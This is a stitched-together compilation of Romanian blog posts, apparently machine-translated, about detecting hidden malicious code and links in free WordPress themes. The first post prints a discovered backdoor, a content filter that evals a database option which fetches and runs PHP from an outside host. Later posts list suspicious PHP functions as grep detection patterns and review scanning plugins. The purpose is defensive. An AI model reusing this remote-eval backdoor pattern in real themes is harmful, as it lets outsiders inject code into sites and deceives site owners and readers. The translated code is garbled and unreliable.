Bună prieteni. Sunteți sigur că șablonul WordPress gratuit pe care îl utilizați pentru site-urile și blogurile dvs. este cu adevărat sigur și nu conține amenințări ascunse și cod rău intenționat? Ești complet sigur de asta? Absolut?)
Crezi că au trecut șablonul, au eliminat link-urile ascunse din el și s-a terminat. Scanați periodic fișierele site-ului cu un antivirus, căutați instrumentele pentru webmasteri Yandex în fila Securitate și, cu ușurare, vedeți un mesaj acolo: „ Nu a fost găsit niciun cod rău intenționat pe site«.
Asa am crezut si eu. Nu vreau să te supăr, dar...
Cod periculos ascuns în temele WordPress gratuite
Aceasta este scrisoarea pe care am primit-o săptămâna trecută prin poștă de la găzduirea mea. Recent, au introdus o verificare regulată a tuturor fișierelor site-ului pentru conținut rău intenționat și totuși au găsit acest conținut în mine!
Totul a început cu faptul că într-o zi am fost pe site-ul meu și nu am putut să-l lansez - a apărut o inscripție abuzivă despre fișierele negăsite cu extensia php. După ce m-am tensionat puțin, m-am dus să studiez conținutul folderului cu site-ul de pe găzduire și am descoperit imediat o problemă - fișierul meu șablon fuctions.php a fost redenumit în functions.php.malware, ceea ce, parcă, a sugerat ambiguu - un antivirus sau ceva de genul a funcționat aici) După ce am intrat în e-mail, am găsit raportul de mai sus de la hoster.
Primul lucru pe care l-am făcut, desigur, a fost să verific fisierul dat, i-a studiat conținutul, l-a scanat cu diverse antivirusuri, zeci de servicii on-line pentru verificarea virușilor etc. - până la urmă, nu am găsit nimic, toată lumea a susținut în unanimitate că dosarul este complet în siguranță. Desigur, mi-am exprimat îndoielile hosterului, spunând că ai greșit ceva, dar pentru orice eventualitate, i-am rugat să furnizeze un raport despre descoperirea unei bucăți de cod rău intenționate.
Și asta mi-au spus
Am mers pe google informații despre acest cod și m-am gândit serios la el...
Cum să găsiți o bucată de cod rău intenționat într-un șablon
După cum s-a dovedit, acesta este un truc cu adevărat non-trivial, care permite părților interesate să transfere date pe site-ul dvs. și să modifice conținutul paginilor fără știrea dvs.! Dacă utilizați un șablon gratuit, atunci Vă recomand cu căldură să verificați funcțiile.php pentru următorul cod:
add_filter('the_content', '_bloginfo', 10001);
funcția _bloginfo($conținut)(
global $post;
if(este_singure() && ( [email protected](get_option('blogoption'))) !== false)(
returneaza $co;
) altfel returnează $conținut;
}
Chiar și cu cunoștințele mele foarte superficiale despre php, se poate observa că se creează un anumit filtru care este legat de postarea și conținutul variabilei globale, care sunt responsabile pentru afișarea conținutului numai pe paginile postărilor de blog (condiția is_single). Deja suspect, nu? Ei bine, acum să vedem ce va afișa asta codul dat pe site-ul nostru.
Interesanta opțiune de blog cerută în baza de date pare și ea foarte suspectă. Mergem la baza noastră Date MySQLși găsim acolo un tabel numit wp_options, dacă nu ați schimbat prefixele, atunci va arăta astfel implicit. Și în el găsim o linie de interes pentru noi numită blogoption
Ce frumusete! Vedem următoarea opțiune
return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));
Acestea. noi de pe un anumit site (mai mult, rusă, minte) returnăm conținut care poate transporta orice! Orice număr de link-uri, coduri rău intenționate, text modificat etc. Site-ul în sine, atunci când îl accesează, dă o eroare de acces 403, ceea ce nu este surprinzător. Desigur, am eliminat și această opțiune din baza de date.
Conform informațiilor de la victime, exact conținutul articolului dvs. este de obicei returnat cu o singură modificare - în loc de orice punct "." un link deschis a fost mascat în text! Și apropo, această opțiune este scrisă în baza de date atunci când șablonul în sine este instalat, iar apoi codul care face acest lucru se autodistruge în siguranță. Și am trăit doi ani cu astfel de gunoaie și nici un singur antivirus sau serviciu nu mi-a dezvăluit această amenințare pentru tot acest timp. Sincer să fiu, nu am observat dacă această tehnică a funcționat vreodată pentru mine sau dacă pluginul meu de securitate a blocat această posibilitate (sau poate că una dintre actualizările WordPressa a închis această gaură), dar este totuși neplăcut.
Morala brânzei gratuite
Cum vă place rafinamentul „traducătorilor” noștri de șabloane (sau celor care le postează în cataloagele lor)? Nu e pentru tine să decupezi linkurile din subsol) Păcat că nu-mi amintesc de unde mi-am descărcat șablonul, a fost cu mult timp în urmă, altfel aș fi scris câteva afectuoase. Și dacă la acel moment aș avea aceeași experiență pe care o am acum, atunci cu siguranță nu aș folosi un șablon gratuit sau, în cazuri extreme, nu aș descărca din surse necunoscute!
Este mai ușor să cumperi un șablon premium oficial cu 15-20 de dolari pe același și să trăiești în pace, știind că nu există găuri și legături criptate în el și, chiar dacă există vulnerabilități, dezvoltatorii vor lansa cu siguranță o actualizare în care aceste găuri vor fi închise. ( Apropo, Artem a publicat recent un articol în care doar vorbește despre șabloane premium și chiar distribuie coduri promoționale pentru reduceri brutale pentru cei interesați)
WordPress este cel mai popular motor pentru crearea diverselor site-uri și bloguri de informații. Securitatea site-ului dvs. este mai mult decât securitatea datelor dvs. Acest lucru este mult mai important, deoarece este și siguranța tuturor utilizatorilor care vă citesc resursa și au încredere în ea. De aceea este atât de important ca site-ul să nu fie infectat cu viruși sau orice alt cod rău intenționat.
Vom acoperi cum să protejați WordPress de hacking într-unul dintre următoarele articole, dar acum vreau să vă spun cum să vă verificați site-ul WordPress pentru viruși și coduri rău intenționate pentru a vă asigura că totul este în siguranță.
Prima opțiune care îmi vine în minte este că hackerii te-au spart și au construit ușile din spate în codul site-ului tău pentru a putea trimite spam, pune link-uri și alte lucruri rele. Acest lucru se întâmplă uneori, dar este destul de rar dacă actualizați software-ul la timp.
Există mii de teme și pluginuri WordPress gratuite și aici este pericolul. Una este când descarci un șablon de pe un site WordPress și alta este când îl găsești pe site-ul din stânga. Dezvoltatorii fără scrupule pot încorpora diferite coduri rău intenționate în produsele lor. Există și mai mult risc dacă descărcați șabloane premium gratuit, unde hackerii pot adăuga un fel de gaură de securitate fără a risca nimic, prin care apoi să pătrundă și să facă ceea ce au nevoie. De aceea este atât de important să verificați site-ul dvs. wordpress pentru viruși.
Verificarea site-ului wordpress pentru viruși
Primul lucru la care trebuie să te uiți atunci când verifici un site nu sunt virușii, ci pluginurile WordPress. Rapid și ușor, puteți să vă scanați site-ul și să găsiți secțiuni suspecte de cod care merită urmărite, fie că sunt într-o temă, într-un plugin sau în nucleul Wodpress în sine. Să aruncăm o privire la unele dintre cele mai populare plugin-uri:
1.TOC
Acest plugin foarte simplu verifică toate temele instalate pe site-ul dvs. pentru coduri rău intenționate. Pluginul detectează legăturile ascunse criptate cu inserarea codului base64 și, de asemenea, afișează informatii detaliate despre problemele constatate. Cel mai adesea, părțile găsite ale codului nu sunt viruși, dar pot fi potențial periculoase, așa că ar trebui să le acordați atenție.
Deschis "Aspect" -> "TAC" apoi așteptați până când toate subiectele sunt verificate.
2.Scanner VIP
Foarte asemănător cu scanerul de subiecte TOC, dar cu informații mai detaliate. Aceleași oportunități de a detecta link-uri, cod ascuns și alte inserții rău intenționate. Doar deschideți elementul VIP Scanner din secțiunea de instrumente și analizați rezultatul.
Poate fi suficient să ștergeți fișierele inutile, de exemplu, desktop.ini. Sau trebuie să aruncați o privire mai atentă la ceea ce se întâmplă în fișierele care utilizează base64.
3. Anti-Malware de la GOTMLS.NET
Acest plugin vă permite nu numai să scanați temele și miezul site-ului pentru viruși, ci și să protejați site-ul de forța brută a parolei și diferite atacuri XSS, SQLInj. Căutarea se efectuează pe baza semnăturilor și vulnerabilităților cunoscute. Unele vulnerabilități pot fi remediate. Pentru a începe scanarea fișierelor, deschideți „Anti Malvare”în bara laterală și faceți clic „Run Scan”:
Înainte de a putea executa o scanare, trebuie să actualizați bazele de date de semnături.
4.Wordfence
Acesta este unul dintre cele mai populare pluginuri WordPress de securitate și scanare malware. Pe lângă scaner, care poate găsi majoritatea marcajelor în codul WordPress, există protecție în timp real împotriva diferite feluri atacuri și atacuri cu forță brută. În timpul căutării, pluginul găsește posibile probleme cu diverse plugin-uri și teme, vă spune să actualizați WordPress.
Deschide o filă "WP Defense"în bara laterală, apoi accesați fila "Scanare"și apăsați "Incepe scanarea":
Scanarea poate dura anumit timp, dar la finalizare, veți vedea un raport detaliat al problemelor găsite.
5.AntiVirus
Acesta este un alt plugin simplu care va scana șablonul site-ului dvs. pentru cod rău intenționat. Dezavantajul este că doar șablonul curent este scanat, dar informațiile sunt afișate suficient de detaliat. Veți vedea toate caracteristicile periculoase pe care le are tema și apoi puteți analiza în detaliu dacă reprezintă vreun pericol. Găsiți un articol "Antivirus"în setări și apoi faceți clic „Scanați acum șabloanele de teme”:
6. Verificator de integritate
De asemenea, este recomandabil să verificați integritatea Fișiere WordPress, în cazul în care virusul s-a înscris deja pe undeva. Pentru a face acest lucru, puteți utiliza pluginul Integrity Checker. Verifică toate fișierele de bază, plugin și șablon pentru modificări. La sfârșitul scanării, veți vedea informații despre fișierele modificate.
Servicii on-line
Există, de asemenea, mai multe servicii online care vă permit să verificați site-ul wordpress pentru viruși sau doar să verificați șablonul. Iată câteva dintre ele:
themecheck.org- descărcați arhiva temei și puteți vedea toate avertismentele despre posibilele funcții rău intenționate care sunt utilizate în ea. Puteți vizualiza nu numai informații despre tema dvs., ci și despre alte teme încărcate de alți utilizatori, precum și despre versiuni diferite Subiecte. Orice găsesc pluginurile poate fi găsit pe acest site. Examinare teme wordpress este de asemenea foarte important.
virustotal.com- o resursă binecunoscută în care vă puteți verifica site-ul sau fișierul șablon pentru viruși.
ReScan.pro- Verificarea unui site WordPress pentru viruși folosind acest serviciu este gratuită, se efectuează analize statice și dinamice pentru a detecta posibile redirecționări.Scannerul deschide paginile site-ului. Verifică site-ul cu diverse liste negre.
sitecheck.sucuri.net- un serviciu simplu de scanare a site-ului și a temelor pentru viruși. Există un plugin pentru WordPress. Detectează link-uri și scripturi periculoase.
Verificare manuală
Nimic nu poate fi mai bun decât verificarea manuală. Linux are un utilitar grep minunat care vă permite să căutați apariții de șiruri arbitrare într-un folder cu fișiere. Rămâne să înțelegem ce vom căuta:
eval - această funcție vă permite să executați un arbitrar cod php, nu este folosit de produsele care se respectă, dacă unul dintre pluginuri sau tema folosește această funcție, este aproape 100% sigur că există un virus acolo;
- base64_decode- funcțiile de criptare pot fi folosite cu eval pentru a ascunde codul rău intenționat, dar pot fi folosite și în scopuri pașnice, așa că aveți grijă;
- sha1- o altă metodă de criptare a codului rău intenționat;
- gzinflate- funcție de compresie, aceleași obiective, împreună cu eval, de exemplu, gzinflate(base64_decode(code);
- strrev- întoarce șirul înapoi nu înainte, deoarece o variantă poate fi folosită pentru criptarea primitivă;
- imprimare- tipărește informații în browser, împreună cu gzinflate sau base64_decode este periculos;
- fișier_put_conținut- WordPress însuși sau pluginurile pot crea în continuare fișiere în sistemul de fișiere, dar dacă tema face acest lucru, atunci ar trebui să fiți atenți și să verificați de ce are nevoie de el, deoarece pot fi instalați viruși;
- file_get_contents- în majoritatea cazurilor este folosit în scopuri pașnice, dar poate fi folosit pentru a descărca cod rău intenționat sau pentru a citi informații din fișiere;
- răsuci- aceeași poveste;
- fopen- deschide un fișier pentru scriere, nu se știe niciodată ce;
- sistem- funcția execută o comandă într-un sistem Linux, dacă este realizată de o temă, plugin sau wordpress în sine, cel mai probabil există un virus;
- link simbolic- creează legături simbolice în sistem, poate că virusul încearcă să facă principalul Sistemul de fișiere disponibil din exterior;
- copie- copiază un fișier dintr-un loc în altul;
- getcwd- returnează numele directorului de lucru curent;
- cwd- schimbă directorul de lucru curent;
- ini_get- primește informații despre setările PHP, adesea în scopuri pașnice, dar nu se știe niciodată;
- error_reporting(0)- dezactivează ieșirea oricăror mesaje de eroare;
- window.top.location.href- functie javascript folosita pentru redirectionari catre alte pagini;
- tocat- așa că, pentru orice eventualitate, verificăm, brusc, hackerul însuși a decis să ne spună.
Puteți înlocui fiecare cuvânt individual într-o comandă ca aceasta:
grep -R "piratat" /var/www/path/to/files/wordpress/wp-content/
Sau folosiți un script simplu care va căuta toate cuvintele simultan:
values="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.location.href
copie(
eval(
sistem(
link simbolic(
error_reporting(0)
imprimare
file_get_contents(
file_put_contents(
fopen(
tocat"
cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php „$valori” *
Salutare prieteni Idea Fox!
Nu știu despre tine, dar nu dorm bine noaptea. Problemele de securitate din blog mă chinuiesc. Gata cu puterea :-)
Am citit o grămadă de bloguri pe acest subiect și am testat multe plugin-uri care ajută la rezolvarea acestei probleme. Da, iar în comentarii au început să pună întrebări pe tema protejării site-ului, ceea ce m-a determinat să scriu această notă.
Imaginează-ți doar că faci bloguri, scrii articole, încerci... Și nenorociți vin și îți sparg site-ul. Cred că vor fi multe dezamăgiri.
La urma urmei, fiecare blogger normal investește mult timp și efort în dezvoltarea site-ului său. Și pentru mulți, blogging-ul devine, în general, o obsesie... De aici și în sus, dacă se întâmplă AȘA ceva :-)
Ei bine, înțelegi cât de important este asta.
Sa trecem in sfarsit la treaba :)
Acum câteva luni am scris deja o notă despre ceva din hacking. Asigurați-vă că o citiți. Dar a trecut destul de mult timp de atunci și am luat măsuri suplimentare pentru a consolida apărarea generală.
În notele următoare, cu siguranță mă voi opri asupra acestei probleme în detaliu. (Îmi amintesc și scriu despre configurarea ISP-ului)
3. Verificăm site-ul pe alte servicii online
Astfel de servicii au divorțat aparent-invizibil. Am o părere puternică că multe dintre ele sunt complet stupide și create exclusiv pentru a afișa reclame.
Doctor Web
DR.Web realizat serviciu bun pentru a verifica site-urile online. Personal, m-a ajutat o dată să găsesc o infecție de la un prieten de pe blog (Exista un cod terță parte în fișierul .htaccess)
Verificarea este foarte simplă. Introduceți adresa URL și așteptați rezultatul verificării.
antivirus-alarm.ru
Un crawler puternic pentru site-uri web care folosește până la 43 baze de date antivirus de la cele mai importante companii antivirus din lume.
Și aici totul este foarte simplu. Conducem în URL-ul site-ului nostru și așteptăm cu răsuflarea tăiată rezultatele scanării.
Aceasta este ceea ce am tot așteptat.
Totul este curat, poti dormi linistit :-)
Toate acestea sunt cu siguranță bune, dar trebuie să instalați și câteva plugin-uri care nu interferează deloc cu blogurile WordPress.
4. Cereți gazdei să vă verifice site-ul
Faptul este că hosterii sunt și mai preocupați de problemele de securitate decât dvs. și au instrumente puternice de protecție. Și mijloace specializate de protecție.
Iată știrile mele pentru tine astăzi. În continuare, voi vorbi despre plugin puternic, care vă permite să vă protejați în mod semnificativ blogul WordPress de hacking.
Lucrez cu el de 2 luni si sunt foarte multumit de el. Până acum m-am ocupat de el de 3 ori și mi-am interzis: -) Pe scurt, e ceva de spus.
Unul dintre repere la crearea unui blog - alegerea unui șablon de înaltă calitate. Există multe site-uri, atât plătite, cât și gratuite. Cu toate acestea, trebuie să fiți atenți aici, deoarece există o mare probabilitate să obțineți viruși, scripturi rău intenționate și link-uri ascunse împreună cu fișierul.
Dar chiar dacă șablonul este curat din punct de vedere al securității, iar designul, gradul de utilizare și funcționalitatea lui ți se potrivesc pe deplin, asta nu înseamnă că totul este în ordine. Tema trebuie să aibă cod HTML și CSS valid, precum și să respecte toate standardele CMS WordPress. Chiar și temele plătite și șabloanele personalizate au probleme cu acestea din urmă.
Dezvoltatorii de motoare îl dezvoltă în mod constant, iar autorii șabloanelor nu țin întotdeauna pasul cu ele, folosind funcții depreciate atunci când le creează.
Astăzi vă voi arăta 2 moduri de a verifica temele WordPress pentru conformitatea cu standardele. Aceste instrumente sunt folosite atunci când sunt adăugate în directorul oficial https://wordpress.org/themes/
Serviciu de verificare a temelor WordPress și a șabloanelor Joomla pentru conformitatea cu standardele
ThemeCheck.org este serviciu gratuit, care vă permite să verificați securitatea și calitatea șabloanelor pentru CMS WordPress și Joomla înainte de a le instala pe site.
Pentru a verifica o temă, încărcați arhiva acesteia de pe computer făcând clic pe butonul „Selectați fișierul” de pe site-ul web themecheck.org. Dacă nu doriți ca rezultatele scanării să fie salvate în serviciu și puse la dispoziția altor utilizatori, bifați „ Uitați datele încărcate după rezultate„. Acum apăsați butonul „Trimiteți”.
De exemplu, am luat subiectul Interfață descărcat de pe site-ul oficial. 99 din 100 - 0 erori criticeși 1 avertisment. Acesta este un rezultat foarte bun.
În comparație, șablonul meu de blog a primit un scor de 0 (14 erori și 23 de avertismente). Cred că pentru mulți, rezultatele nu vor diferi prea mult, mai ales dacă subiectele sunt deja depășite. Toate comentariile cu explicații, indicând fișierele și rândurile în care au fost găsite, se află pe aceeași pagină de mai jos.
Sincer, nu am înțeles mare lucru acolo, va fi mai util pentru autori și îmi este mai ușor să schimb șablonul decât să repar totul. Doar că nu știu când voi ajunge la asta.
Home are o selecție mare de teme web WordPress și Joomla testate anterior, cu posibilitatea de a sorta după timpul adăugat sau evaluat. Când faceți clic pe ele, puteți vedea informații detaliate și link-uri către site-ul web al autorului și pagina de descărcare.
Dacă sunteți dezvoltator și tema dvs. este 100% validă, puteți informa utilizatorii despre aceasta setând o insignă specială de evaluare pe ea.
Valoarea serviciului ThemeCheck.org este că orice webmaster îl poate folosi pentru a selecta o temă de calitate chiar înainte de a fi instalată pe blog.
Plugin de verificare a temei
Puteți verifica un șablon deja instalat pentru compatibilitatea cu cele mai recente standarde WordPress folosind pluginul Theme Check. Link pentru descărcare ultima versiune: https://wordpress.org/plugins/theme-check/
Funcționalitatea pluginului este similară cu serviciul pe care l-am descris mai sus. Nu este nevoie să faceți setări după instalarea și activarea standard. Verificarea comenzii:
- Accesați panoul de administrare de pe pagina de meniu „Aspect”-„Verificarea temei“.
- Selectați tema dorită din lista derulantă dacă există mai multe instalate.
- Bifați caseta „Suprimați INFO” dacă nu doriți să trimiteți informații.
- Faceți clic pe butonul „Verificați”.
Rezultatele vor fi afișate pe aceeași pagină.
După cum puteți vedea, tema implicită Doua zeci zece nici nu este ideal, dar, de exemplu, Douăzeci și paisprezece nu are erori.
După verificarea pluginului, îl puteți dezactiva și este mai bine să îl ștergeți complet până data viitoare.
Concluzie.Înainte de a instala un nou șablon WordPress, verificați-l nu numai pentru link-uri ascunseși cod rău intenționat cu pluginul TAC, dar și cu serviciul ThemeCheck.org sau pluginul Theme Check pentru conformitatea cu cele mai recente standarde CMS.
P.S.În timp ce răsfoiam TopSape Reader recent, am văzut un nou blog SEO zenpr.ru, care deține locul 1 printre bloggeri în ceea ce privește clicurile pe lună. Având în vedere că vârsta lui este puțin peste o lună, rezultatul este demn de respect. Design în stilul minimalismului, dacă nu să spunem că nu există deloc, dar autorul scrie - îl vei citi. Toate afaceri și fără apă. La fel ca în titlul blogului - „zero caractere în plus”. Vă recomand să citiți, veți găsi o mulțime de informații utile.
Există o mulțime de șabloane gratuite de site-uri pe Internet. Acea brânză gratuită se întâmplă doar într-o capcană de șoareci, toată lumea știe și totuși mâna se întinde să descarce un astfel de gratuit și să îl instaleze pe site-ul tău.
Înainte de a instala un șablon gratuit, nu ar strica să îl verificați pentru link-uri ascunse.
Punând un șablon gratuit, mulți nici măcar nu presupun că pur și simplu nu pot promova și câștiga bani pe un astfel de site.
Într-un astfel de șablon, pot exista mai multe link-uri simultan. De asemenea, este bine dacă linkurile imbricate sunt către un site similar cu subiectul dvs. și nu către site-uri pentru adulți. Și vor fi doar două sau trei, nu zeci.
Cum vă amenință site-ul instalarea unui astfel de șablon gratuit? Site-ul va cădea sub filtru, ieșirea din care este aproape imposibilă. Un site sub filtre este un site mort!
Instalarea unui șablon gratuit pe site-ul tău este ca și cum ai juca la ruleta rusă. Singura șansă de a seta absolut model curat, este egal cu zero.
În cel mai bun caz, veți primi 3-5 link-uri rămase pe site-ul dvs. Puteți, desigur, să încercați să curățați un astfel de șablon, dar există meșteri care introduc link-uri în șablon în așa fel încât să nu poată fi eliminate de acolo (șablonul este rupt, doar se deformează).
Sincer să fiu, este mai ușor să comanzi un șablon nou curat și unic (ceea ce nu se poate spune despre gratuit), va costa mai puțin.
De exemplu, percep 200 de ruble pentru crearea unui șablon (scrieți pe Skype: oxamitta). Spune-mi, merită? Eliberați-vă și pierdeți site-ul, dar economisiți 200 de ruble? Wow economii!!!
Dar dacă ați pariat deja pe un șablon gratuit? Cum să verificați un șablon pentru link-uri ascunse?
Există un plugin special pentru asta. Nu vă va ajuta să eliminați aceste legături, ci să le identificați - vă rugăm.
Poate că nu totul este atât de înfricoșător, iar șablonul tău are doar câteva link-uri externe! Doriți să testați șablonul? Apoi descărcați pluginul din linkul de mai jos (pentru a vedea linkul de descărcare a pluginului, faceți clic pe unul dintre butoanele rețelelor sociale).
Pluginul este instalat în panoul de administrare a site-ului în mod standard. Nu are sens să filmăm despre acest videoclip, așa că astăzi ne vom descurca cu câteva capturi de ecran.
Instalează pluginul și activează.
Pentru a mări captura de ecran, faceți clic pe ea cu butonul stâng al mouse-ului. 
Accesați fila Aspect, TAS.
Se încarcă...